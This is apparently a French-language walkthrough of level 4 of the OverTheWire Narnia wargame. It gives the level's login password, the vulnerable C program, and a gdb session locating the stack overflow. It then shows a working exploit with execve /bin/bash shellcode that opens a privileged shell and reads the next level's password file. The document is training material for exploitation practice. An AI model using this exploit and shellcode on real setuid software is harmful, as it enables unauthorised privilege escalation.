====== Level 4 ======
ssh narnia4@narnia.labs.overthewire.org
pass : thaenohtai
#include
#include
#include
#include
extern char **environ;
int main(int argc,char **argv){
int i;
char buffer[256];
for(i = 0; environ[i] != NULL; i++)
memset(environ[i], '\0', strlen(environ[i]));
if(argc>1)
strcpy(buffer,argv[1]);
return 0;
}
Buffer stack overflow classique, si vous avez l'habitude d'utiliser les variables d'environnement pour mettre votre shellcode cela ne va pas être possible ici : il est entièrement mis à ''NULL'' ! On va donc mettre directement notre shellcode dans ''buffer'' et sauter dessus :)
gdb$ r $(python -c 'print "\xcc"*272+"BBBB"')
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: F7FD2FF4 ECX: 00000000 EDX: FFFFD919 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: CCCCCCCC ESP: FFFFD620 EIP: 42424242
CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002BError while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
gdb$ x/200x $esp
0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420
0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001
0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8
0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000
0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000
0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0
0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4
0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1
0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500
0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918
0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000
0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e
0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81
0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc
0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31
0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71
0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020
0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010
0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011
0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004
0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007
0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009
0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c
0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e
0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019
0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f
0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000
0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c
0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836
0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e
0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000
Nous pouvons donc par exemple sauter à l'adresse ''0xffffd830''.
narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"')
bash-4.2$ id
uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
bash-4.2$ cat /etc/narnia_pass/narnia5
faimahchiy